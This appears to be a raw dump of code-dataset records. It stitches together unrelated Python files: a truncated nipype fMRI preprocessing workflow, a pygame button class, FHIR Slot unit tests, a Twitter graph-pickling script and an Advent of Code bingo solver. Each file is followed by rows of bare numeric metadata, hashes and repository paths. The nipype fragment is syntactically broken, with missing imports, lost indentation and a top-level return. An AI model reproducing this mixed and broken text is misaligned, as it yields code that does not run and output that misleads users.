from nipype.interfaces.fsl import MCFLIRT, TOPUP
from nipype.interfaces.fsl import ApplyTOPUP as APPLYTOPUP
from nipype.interfaces.fsl import Merge as MERGE
from nipype.interfaces.fsl.maths import MeanImage
from nipype.interfaces.fsl.utils import Smooth
###################################
### GLOBALS, PATHS ###
###################################
MNItemplate = os.path.join(get_resource_path(),'MNI152_T1_3mm_brain.nii.gz')
MNItemplatehasskull = os.path.join(get_resource_path(),'MNI152_T1_3mm.nii.gz')
bet_ants_template = os.path.join(get_resource_path(),'OASIS_template.nii.gz')
bet_ants_prob_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumProbabilityMask.nii.gz')
bet_ants_registration_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumRegistrationMask.nii.gz')
acquistions = [
'p1Xs2X3mmXsl48Xap',
'p1Xs4X3mmXsl48Xap',
'p1Xs6X3mmXsl48Xap',
'p1Xs8X3mmXsl48Xap',
]
encoding_file = os.path.join(base_dir,'encoding_file.txt')
###################################
### DATA INPUT ###
###################################
layout = BIDSLayout(base_dir)
#BIDS needs the 'sub' part of sid removed
subId = subject_id[4:]
#Straight up grab the single anat nifti
anat = layout.get(subject=subId,type='T1w',extensions='.nii.gz')[0].filename
#Get a list of all epis and wrap them in an iterable node
funcs = [f.filename for f in layout.get(subject=subId,type='bold',extensions='.nii.gz') if f.acquisition in acquistions]
func_scans = Node(IdentityInterface(fields=['scan']),name='func_scans')
func_scans.iterables = ('scan',funcs)
#Get a list of all distortion correction scans
dis_corrs = [f.filename for f in layout.get(subject=subId,type='bold',extensions='.nii.gz',task='discorr')]
#####################################
## DISTORTION CORRECTION ##
#####################################
#Merge AP and PA distortion correction scans
merge_discorr = Node(interface=MERGE(dimension='t'),name='merge_discorr')
merge_discorr.inputs.output_type = 'NIFTI_GZ'
merge_discorr.inputs.in_files = dis_corrs
#Create distortion correction map
topup = Node(interface=TOPUP(),name='topup')
topup.inputs.output_type = 'NIFTI_GZ'
topup.inputs.encoding_file = encoding_file
#Apply distortion correction to other scans
apply_topup = Node(interface=APPLYTOPUP(),name='apply_topup')
apply_topup.inputs.output_type = 'NIFTI_GZ'
apply_topup.inputs.method = 'jac'
apply_topup.inputs.encoding_file = encoding_file
###################################
### REALIGN ###
###################################
realign_fsl = Node(MCFLIRT(),name="realign")
realign_fsl.inputs.cost = 'mutualinfo'
realign_fsl.inputs.mean_vol = True
realign_fsl.inputs.output_type = 'NIFTI_GZ'
realign_fsl.inputs.save_mats = True
realign_fsl.inputs.save_rms = True
realign_fsl.inputs.save_plots = True
###################################
### MEAN EPIs ###
###################################
#For coregistration after realignment
mean_epi = Node(MeanImage(),name='mean_epi')
mean_epi.inputs.dimension = 'T'
#For after normalization is done to plot checks
mean_norm_epi = Node(MeanImage(),name='mean_norm_epi')
mean_norm_epi.inputs.dimension = 'T'
###################################
### MASK, ART, COV CREATION ###
###################################
compute_mask = Node(ComputeMask(), name='compute_mask')
compute_mask.inputs.m = .05
art = Node(ArtifactDetect(),name='art')
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'FSL'
make_cov = Node(Create_Covariates(),name='make_cov')
###################################
### BRAIN EXTRACTION ###
###################################
brain_extraction_ants = Node(BrainExtraction(),name='brain_extraction')
brain_extraction_ants.inputs.anatomical_image = anat #from BIDS
brain_extraction_ants.inputs.dimension = 3
brain_extraction_ants.inputs.use_floatingpoint_precision = 1
brain_extraction_ants.inputs.num_threads = 12
brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
brain_extraction_ants.inputs.keep_temporary_files = 1
brain_extraction_ants.inputs.brain_template = bet_ants_template
brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
###################################
### COREGISTRATION ###
###################################
coregistration = Node(Registration(), name='coregistration')
coregistration.inputs.float = False
coregistration.inputs.output_transform_prefix = "meanEpi2highres"
coregistration.inputs.transforms = ['Rigid']
coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
coregistration.inputs.number_of_iterations = [[1000,500,250,100]]
coregistration.inputs.dimension = 3
coregistration.inputs.num_threads = 12
coregistration.inputs.write_composite_transform = True
coregistration.inputs.collapse_output_transforms = True
coregistration.inputs.metric = ['MI']
coregistration.inputs.metric_weight = [1]
coregistration.inputs.radius_or_number_of_bins = [32]
coregistration.inputs.sampling_strategy = ['Regular']
coregistration.inputs.sampling_percentage = [0.25]
coregistration.inputs.convergence_threshold = [1.e-8]
coregistration.inputs.convergence_window_size = [10]
coregistration.inputs.smoothing_sigmas = [[3,2,1,0]]
coregistration.inputs.sigma_units = ['mm']
coregistration.inputs.shrink_factors = [[8,4,2,1]]
coregistration.inputs.use_estimate_learning_rate_once = [True]
coregistration.inputs.use_histogram_matching = [False]
coregistration.inputs.initial_moving_transform_com = True
coregistration.inputs.output_warped_image = True
coregistration.inputs.winsorize_lower_quantile = 0.01
coregistration.inputs.winsorize_upper_quantile = 0.99
###################################
### NORMALIZATION ###
###################################
#ANTS steps through several different iterations starting with linear, affine and finally non-linear diffeomorphic alignment. The settings below increase the run time but yield a better alignment solution
normalization = Node(Registration(),name='normalization')
normalization.inputs.float = False
normalization.inputs.collapse_output_transforms=True
normalization.inputs.convergence_threshold=[1e-06]
normalization.inputs.convergence_window_size=[10]
normalization.inputs.dimension = 3
normalization.inputs.fixed_image = MNItemplate #MNI 152 1mm
normalization.inputs.initial_moving_transform_com=True
normalization.inputs.metric=['MI', 'MI', 'CC']
normalization.inputs.metric_weight=[1.0]*3
normalization.inputs.number_of_iterations=[[1000, 500, 250, 100],
[1000, 500, 250, 100],
[100, 70, 50, 20]]
normalization.inputs.num_threads=12
normalization.inputs.output_transform_prefix = 'anat2template'
normalization.inputs.output_inverse_warped_image=True
normalization.inputs.output_warped_image = True
normalization.inputs.radius_or_number_of_bins=[32, 32, 4]
normalization.inputs.sampling_percentage=[0.25, 0.25, 1]
normalization.inputs.sampling_strategy=['Regular',
'Regular',
'None']
normalization.inputs.shrink_factors=[[8, 4, 2, 1]]*3
normalization.inputs.sigma_units=['vox']*3
normalization.inputs.smoothing_sigmas=[[3, 2, 1, 0]]*3
normalization.inputs.terminal_output='stream'
normalization.inputs.transforms = ['Rigid','Affine','SyN']
normalization.inputs.transform_parameters=[(0.1,),
(0.1,),
(0.1, 3.0, 0.0)]
normalization.inputs.use_histogram_matching=True
normalization.inputs.winsorize_lower_quantile=0.005
normalization.inputs.winsorize_upper_quantile=0.995
normalization.inputs.write_composite_transform=True
###################################
### APPLY TRANSFORMS AND SMOOTH ###
###################################
#The nodes above compute the required transformation matrices but don't actually apply them to the data. Here we're merging both matrices and applying them in a single transformation step to reduce the amount of data interpolation.
merge_transforms = Node(Merge(2), iterfield=['in2'], name ='merge_transforms')
apply_transforms = Node(ApplyTransforms(),iterfield=['input_image'],name='apply_transforms')
apply_transforms.inputs.input_image_type = 3
apply_transforms.inputs.float = False
apply_transforms.inputs.num_threads = 12
apply_transforms.inputs.environ = {}
apply_transforms.inputs.interpolation = 'BSpline'
apply_transforms.inputs.invert_transform_flags = [False, False]
apply_transforms.inputs.terminal_output = 'stream'
apply_transforms.inputs.reference_image = MNItemplate
#Use FSL for smoothing
smooth = Node(Smooth(),name='smooth')
smooth.inputs.sigma = 6.0
#####################################
### DOWNSAMPLE PRECISION ###
#####################################
down_samp = Node(Down_Sample_Precision(),name='down_samp')
###################################
### PLOTS ###
###################################
plot_realign = Node(Plot_Realignment_Parameters(),name="plot_realign")
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
plot_normalization_check = Node(Plot_Coregistration_Montage(),name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
###################################
### DATA OUTPUT ###
###################################
#Collect all final outputs in the output dir and get rid of file name additions
datasink = Node(DataSink(),name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
datasink.inputs.substitutions = [('_scan_..mnt..Raw..' + subject_id + '..func..',''),
(subject_id+'_acq-p1X',''),
('X3mmXsl48Xap_bold.nii.gz','')]
###################################
### HOOK IT ALL CAPTAIN! ###
###################################
workflow = Workflow(name='Preprocessing')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([
(merge_discorr, topup, [('merged_file','in_file')]),
(topup, apply_topup,[('out_fieldcoef','in_topup_fieldcoef'),
('out_movpar','in_topup_movpar')]),
(func_scans, apply_topup, [('scan','in_files')]),
(apply_topup, realign_fsl, [('out_corrected','in_file')]),
(realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
(realign_fsl, plot_qa, [('out_file','dat_img')]),
(realign_fsl, art, [('out_file','realigned_files'),
('par_file','realignment_parameters')]),
(realign_fsl, mean_epi, [('out_file','in_file')]),
(realign_fsl, make_cov, [('par_file','realignment_parameters')]),
(mean_epi, compute_mask, [('out_file','mean_volume')]),
(compute_mask, art, [('brain_mask','mask_file')]),
(art, make_cov, [('outlier_files','spike_id')]),
(brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
(mean_epi, coregistration, [('out_file','moving_image')]),
(brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
(coregistration, merge_transforms, [('composite_transform','in2')]),
(normalization, merge_transforms, [('composite_transform','in1')]),
(merge_transforms, apply_transforms, [('out','transforms')]),
(realign_fsl, apply_transforms, [('out_file','input_image')]),
(apply_transforms, mean_norm_epi, [('output_image','in_file')]),
(mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
(apply_transforms, smooth, [('output_image','in_file')]),
(smooth, down_samp, [('smoothed_file','in_file')]),
(down_samp, datasink, [('out_file','functional.@down_samp')]),
(plot_realign, datasink, [('plot','functional.@plot_realign')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
(make_cov, datasink, [('covariates','functional.@covariates')]),
(brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
(normalization, datasink, [('warped_image','structural.@normalize')])
])
if not os.path.exists(os.path.join(output_dir,'Preprocsteps.png')):
workflow.write_graph(dotfilename=os.path.join(output_dir,'Preprocsteps'),format='png')
return workflow
| 47.371609
| 235
| 0.629149
| 10,605
| 97,775
| 5.579821
| 0.073362
| 0.034677
| 0.017913
| 0.012252
| 0.909589
| 0.899652
| 0.890121
| 0.886014
| 0.883412
| 0.880708
| 0
| 0.011902
| 0.1991
| 97,775
| 2,063
| 236
| 47.394571
| 0.743755
| 0.218082
| 0
| 0.836993
| 0
| 0
| 0.139484
| 0.032377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008446
| false
| 0
| 0.098818
| 0
| 0.115709
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cc42f4d3eb0ac511b8c5580d7d1e3f0eac8ade1
| 41
|
py
|
Python
|
Example/third_party_code/foo.py
|
phueb/LudwigCluster
|
1c1f8cdb26031a9ed78232482cfa1e4fe9e36256
|
[
"MIT"
] | null | null | null |
Example/third_party_code/foo.py
|
phueb/LudwigCluster
|
1c1f8cdb26031a9ed78232482cfa1e4fe9e36256
|
[
"MIT"
] | 1
|
2022-03-30T14:07:13.000Z
|
2022-03-30T14:07:13.000Z
|
Example/third_party_code/foo.py
|
phueb/LudwigCluster
|
1c1f8cdb26031a9ed78232482cfa1e4fe9e36256
|
[
"MIT"
] | 2
|
2020-06-15T13:06:53.000Z
|
2021-02-12T00:33:29.000Z
|
def bar():
    """Return a fixed example string."""
    message = 'Just an example'
    return message
| 10.25
| 28
| 0.609756
| 6
| 41
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.268293
| 41
| 3
| 29
| 13.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
98072352328ff4ca09f9499b24c2ce540efb4c5a
| 1,130
|
py
|
Python
|
modules.py
|
gameme10/PyPet
|
f13e8a386def0b721154f3d1b171027d6d38dce4
|
[
"MIT"
] | null | null | null |
modules.py
|
gameme10/PyPet
|
f13e8a386def0b721154f3d1b171027d6d38dce4
|
[
"MIT"
] | 1
|
2021-09-26T13:14:07.000Z
|
2021-09-26T13:14:07.000Z
|
modules.py
|
gameme10/PyPet
|
f13e8a386def0b721154f3d1b171027d6d38dce4
|
[
"MIT"
] | 1
|
2022-01-18T19:36:10.000Z
|
2022-01-18T19:36:10.000Z
|
class Button():
    # Packed configuration/state for the button, populated externally before use.
    # Layout observed from the indexing in this class (confirm against callers):
    #   extras[0] -> (x, y) base position pair
    #   extras[1] -> divisor pair used to scale the position
    #   extras[2] -> presumably the pygame module (mouse, draw, MOUSEBUTTONDOWN read from it)
    #   extras[3] -> target surface drawn onto / blitted to
    #   extras[4] -> idle fill colour, extras[5] -> hover fill colour
    #   extras[6] -> font object, extras[7] -> text colour, extras[8] -> label text
    extras = None
    def display(self):
        # Draw a 140x40 rectangle at the scaled position, using the hover colour
        # when the mouse cursor is currently inside that rectangle.
        if self.extras[0][0]/self.extras[1][0] <= self.extras[2].mouse.get_pos()[0] <= self.extras[0][0]/self.extras[1][0]+140 and self.extras[0][1]/self.extras[1][1] <= self.extras[2].mouse.get_pos()[1] <= self.extras[0][1]/self.extras[1][1]+40:
            # NOTE(review): the rect's y coordinate divides by extras[1][0] while the
            # hover test above divides by extras[1][1] — looks inconsistent; confirm intended.
            self.extras[2].draw.rect(self.extras[3],self.extras[5],[self.extras[0][0]/self.extras[1][0],self.extras[0][1]/self.extras[1][0],140,40])
        else:
            self.extras[2].draw.rect(self.extras[3],self.extras[4],[self.extras[0][0]/self.extras[1][0],self.extras[0][1]/self.extras[1][0],140,40])
        # Render the label text; the offset divides by a hard-coded 10 rather than
        # the extras[1] divisors used above — TODO confirm that is deliberate.
        self.extras[3].blit(self.extras[6].render(self.extras[8] , True , self.extras[7]) , (self.extras[0][0]/10+20,self.extras[0][1]/10+5))
    def isClicked(self, event):
        # Return True when a mouse-button-down event occurs while the cursor is
        # inside the button's rectangle; implicitly returns None otherwise.
        if event.type == self.extras[2].MOUSEBUTTONDOWN:
            if self.extras[0][0]/self.extras[1][0] <= self.extras[2].mouse.get_pos()[0] <= self.extras[0][0]/self.extras[1][0]+140 and self.extras[0][1]/self.extras[1][1] <= self.extras[2].mouse.get_pos()[1] <= self.extras[0][1]/self.extras[1][1]+40:
                return True
| 86.923077
| 250
| 0.612389
| 206
| 1,130
| 3.339806
| 0.174757
| 0.59593
| 0.223837
| 0.139535
| 0.712209
| 0.712209
| 0.712209
| 0.712209
| 0.712209
| 0.712209
| 0
| 0.1
| 0.132743
| 1,130
| 13
| 251
| 86.923077
| 0.602041
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98181c57a789b69e62faf42abcbb6214de73ebc9
| 8,780
|
py
|
Python
|
fhir/resources/tests/test_slot.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/tests/test_slot.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/tests/test_slot.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Slot
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import slot
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class SlotTests(unittest.TestCase):
    """Round-trip tests for the FHIR R4 Slot resource.

    Each testSlotN loads one bundled example JSON file, asserts its parsed
    field values (implSlotN), serializes back with as_json(), re-parses the
    result, and asserts the same field values again.
    """
    def instantiate_from(self, filename):
        """Load *filename* from FHIR_UNITTEST_DATADIR (or CWD) and return a Slot."""
        datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
        with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
            js = json.load(handle)
            self.assertEqual("Slot", js["resourceType"])
        return slot.Slot(js)
    def testSlot1(self):
        """slot-example-busy.json parses and survives a JSON round trip."""
        inst = self.instantiate_from("slot-example-busy.json")
        self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
        self.implSlot1(inst)
        js = inst.as_json()
        self.assertEqual("Slot", js["resourceType"])
        inst2 = slot.Slot(js)
        self.implSlot1(inst2)
    def implSlot1(self, inst):
        """Field-level assertions for the 'busy' example slot."""
        self.assertEqual(
            force_bytes(inst.comment),
            force_bytes(
                "Assessments should be performed before requesting appointments in this slot."
            ),
        )
        self.assertEqual(inst.end.date, FHIRDate("2013-12-25T09:15:00Z").date)
        self.assertEqual(inst.end.as_json(), "2013-12-25T09:15:00Z")
        self.assertEqual(force_bytes(inst.id), force_bytes("1"))
        self.assertEqual(
            force_bytes(inst.identifier[0].system),
            force_bytes("http://example.org/identifiers/slots"),
        )
        self.assertEqual(force_bytes(inst.identifier[0].value), force_bytes("123132"))
        self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
        self.assertEqual(
            force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
        )
        self.assertEqual(
            force_bytes(inst.meta.tag[0].system),
            force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
        )
        self.assertTrue(inst.overbooked)
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].display),
            force_bytes("General Practice"),
        )
        self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:00:00Z").date)
        self.assertEqual(inst.start.as_json(), "2013-12-25T09:00:00Z")
        self.assertEqual(force_bytes(inst.status), force_bytes("busy"))
        self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
    def testSlot2(self):
        """slot-example.json parses and survives a JSON round trip."""
        inst = self.instantiate_from("slot-example.json")
        self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
        self.implSlot2(inst)
        js = inst.as_json()
        self.assertEqual("Slot", js["resourceType"])
        inst2 = slot.Slot(js)
        self.implSlot2(inst2)
    def implSlot2(self, inst):
        """Field-level assertions for the 'free' (walk-in) example slot."""
        self.assertEqual(
            force_bytes(inst.appointmentType.coding[0].code), force_bytes("WALKIN")
        )
        self.assertEqual(
            force_bytes(inst.appointmentType.coding[0].display),
            force_bytes("A previously unscheduled walk-in visit"),
        )
        self.assertEqual(
            force_bytes(inst.appointmentType.coding[0].system),
            force_bytes("http://terminology.hl7.org/CodeSystem/v2-0276"),
        )
        self.assertEqual(
            force_bytes(inst.comment),
            force_bytes(
                "Assessments should be performed before requesting appointments in this slot."
            ),
        )
        self.assertEqual(inst.end.date, FHIRDate("2013-12-25T09:30:00Z").date)
        self.assertEqual(inst.end.as_json(), "2013-12-25T09:30:00Z")
        self.assertEqual(force_bytes(inst.id), force_bytes("example"))
        self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
        self.assertEqual(
            force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
        )
        self.assertEqual(
            force_bytes(inst.meta.tag[0].system),
            force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].display),
            force_bytes("General Practice"),
        )
        self.assertEqual(
            force_bytes(inst.serviceType[0].coding[0].code), force_bytes("57")
        )
        self.assertEqual(
            force_bytes(inst.serviceType[0].coding[0].display),
            force_bytes("Immunization"),
        )
        self.assertEqual(
            force_bytes(inst.specialty[0].coding[0].code), force_bytes("408480009")
        )
        self.assertEqual(
            force_bytes(inst.specialty[0].coding[0].display),
            force_bytes("Clinical immunology"),
        )
        self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:15:00Z").date)
        self.assertEqual(inst.start.as_json(), "2013-12-25T09:15:00Z")
        self.assertEqual(force_bytes(inst.status), force_bytes("free"))
        self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
    def testSlot3(self):
        """slot-example-unavailable.json parses and survives a JSON round trip."""
        inst = self.instantiate_from("slot-example-unavailable.json")
        self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
        self.implSlot3(inst)
        js = inst.as_json()
        self.assertEqual("Slot", js["resourceType"])
        inst2 = slot.Slot(js)
        self.implSlot3(inst2)
    def implSlot3(self, inst):
        """Field-level assertions for the 'busy-unavailable' example slot."""
        self.assertEqual(
            force_bytes(inst.comment), force_bytes("Dr Careful is out of the office")
        )
        self.assertEqual(inst.end.date, FHIRDate("2013-12-25T09:45:00Z").date)
        self.assertEqual(inst.end.as_json(), "2013-12-25T09:45:00Z")
        self.assertEqual(force_bytes(inst.id), force_bytes("3"))
        self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
        self.assertEqual(
            force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
        )
        self.assertEqual(
            force_bytes(inst.meta.tag[0].system),
            force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].display),
            force_bytes("General Practice"),
        )
        self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:30:00Z").date)
        self.assertEqual(inst.start.as_json(), "2013-12-25T09:30:00Z")
        self.assertEqual(force_bytes(inst.status), force_bytes("busy-unavailable"))
        self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
    def testSlot4(self):
        """slot-example-tentative.json parses and survives a JSON round trip."""
        inst = self.instantiate_from("slot-example-tentative.json")
        self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
        self.implSlot4(inst)
        js = inst.as_json()
        self.assertEqual("Slot", js["resourceType"])
        inst2 = slot.Slot(js)
        self.implSlot4(inst2)
    def implSlot4(self, inst):
        """Field-level assertions for the 'busy-tentative' example slot."""
        self.assertEqual(
            force_bytes(inst.comment), force_bytes("Dr Careful is out of the office")
        )
        self.assertEqual(inst.end.date, FHIRDate("2013-12-25T10:00:00Z").date)
        self.assertEqual(inst.end.as_json(), "2013-12-25T10:00:00Z")
        self.assertEqual(force_bytes(inst.id), force_bytes("2"))
        self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
        self.assertEqual(
            force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
        )
        self.assertEqual(
            force_bytes(inst.meta.tag[0].system),
            force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
        )
        self.assertEqual(
            force_bytes(inst.serviceCategory[0].coding[0].display),
            force_bytes("General Practice"),
        )
        self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:45:00Z").date)
        self.assertEqual(inst.start.as_json(), "2013-12-25T09:45:00Z")
        self.assertEqual(force_bytes(inst.status), force_bytes("busy-tentative"))
        self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
| 40.837209
| 94
| 0.631663
| 1,049
| 8,780
| 5.181125
| 0.152526
| 0.167433
| 0.165593
| 0.206992
| 0.842134
| 0.824839
| 0.812695
| 0.767801
| 0.739834
| 0.677093
| 0
| 0.054086
| 0.229271
| 8,780
| 214
| 95
| 41.028037
| 0.749076
| 0.019134
| 0
| 0.460317
| 0
| 0
| 0.175965
| 0.011506
| 0
| 0
| 0
| 0
| 0.375661
| 1
| 0.047619
| false
| 0
| 0.042328
| 0
| 0.100529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e22100f9a91b09b5eec49cc39b22e11da5badebc
| 921
|
py
|
Python
|
utils/load_twitter_file_and_save_igraph_file.py
|
mordor-ai/M1MIASHS_projet_twitter
|
d03b2478ac50289e7f6a1c8c83a47df9d3f90467
|
[
"MIT"
] | null | null | null |
utils/load_twitter_file_and_save_igraph_file.py
|
mordor-ai/M1MIASHS_projet_twitter
|
d03b2478ac50289e7f6a1c8c83a47df9d3f90467
|
[
"MIT"
] | null | null | null |
utils/load_twitter_file_and_save_igraph_file.py
|
mordor-ai/M1MIASHS_projet_twitter
|
d03b2478ac50289e7f6a1c8c83a47df9d3f90467
|
[
"MIT"
] | null | null | null |
import utils as u
# Edge and node CSV inputs, and the folder where pickled graphs are written.
e_filename_csv = "../files/twitter_100M.csv"
n_filename_csv = "../files/twitter-2010-ids.csv"
folder_out = "../files/pickle/"
# Build and pickle graphs at increasing sample sizes (100, 1000, 10000).
for sample_size in (100, 1000, 10000):
    u.load_twitter_and_save_pickle_graph(e_filename_csv, n_filename_csv, sample_size, True, out_folder=folder_out)
# Larger (and tiny) runs kept for reference:
# u.load_twitter_and_save_pickle_graph(e_filename_csv,n_filename_csv,100000,True,out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph(e_filename_csv,n_filename_csv,1000000,True,out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph(e_filename_csv,n_filename_csv,10000000,True,out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph (e_filename_csv, n_filename_csv, 10, True, out_folder=folder_out)
print("====== End of program =======")
| 61.4
| 105
| 0.831705
| 160
| 921
| 4.26875
| 0.2
| 0.257687
| 0.140556
| 0.175695
| 0.778917
| 0.746706
| 0.746706
| 0.746706
| 0.746706
| 0.746706
| 0
| 0.048331
| 0.05646
| 921
| 14
| 106
| 65.785714
| 0.737629
| 0.446254
| 0
| 0
| 0
| 0
| 0.19604
| 0.106931
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0.125
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e22e7efa0aead15d09259dfcf18a84949eb201df
| 3,434
|
py
|
Python
|
2021/day04.py
|
valogonor/advent-of-code
|
146b25094870f4812a001d1573ed302514f5d4b5
|
[
"MIT"
] | 1
|
2021-12-08T01:08:13.000Z
|
2021-12-08T01:08:13.000Z
|
2021/day04.py
|
valogonor/advent-of-code
|
146b25094870f4812a001d1573ed302514f5d4b5
|
[
"MIT"
] | null | null | null |
2021/day04.py
|
valogonor/advent-of-code
|
146b25094870f4812a001d1573ed302514f5d4b5
|
[
"MIT"
] | null | null | null |
import sys
sys.stdout = open('output.txt', 'w')  # all print() output goes to output.txt
sys.stdin = open('input.txt')  # input() reads the puzzle input file
# Part One
# First input line: the drawn numbers, comma-separated.
nums = list(map(int, input().split(',')))
boards = []
# Per-board marking state: d[i]['row'][j] / d[i]['col'][k] collect the drawn
# numbers found in row j / column k of board i.
# NOTE(review): assumes exactly 100 boards of 5x5 — confirm against input.txt.
d = {i: {'row': {j: [] for j in range(5)}, 'col': {j: [] for j in range(5)}} for i in range(100)}
for _ in range(100):
    board = []
    # Read 6 lines per board (one is the blank separator) and keep the non-empty ones.
    for _ in range(6):
        row = list(map(int, input().split()))
        if row:
            board.append(row)
    boards.append(board)
for num in nums:
    for i in range(100):
        for j in range(5):
            for k in range(5):
                if boards[i][j][k] == num:
                    # Mark num in board i's row-j and column-k lists.
                    d[i]['row'][j].append(num)
                    d[i]['col'][k].append(num)
                    if len(d[i]['row'][j]) == 5:
                        # Row complete: score = (sum of all cells) - (all marked numbers).
                        sm = 0
                        for row in boards[i]:
                            print(row)
                            sm += sum(row)
                        for l in range(5):
                            for n in d[i]['row'][l]:
                                sm -= n
                        print(num, sm, num*sm, d[i])
                        exit()
                    if len(d[i]['col'][k]) == 5:
                        # Column complete: same scoring as the row case.
                        sm = 0
                        for row in boards[i]:
                            print(row)
                            sm += sum(row)
                        for l in range(5):
                            for n in d[i]['col'][l]:
                                sm -= n
                        print(num, sm, num*sm, d[i])
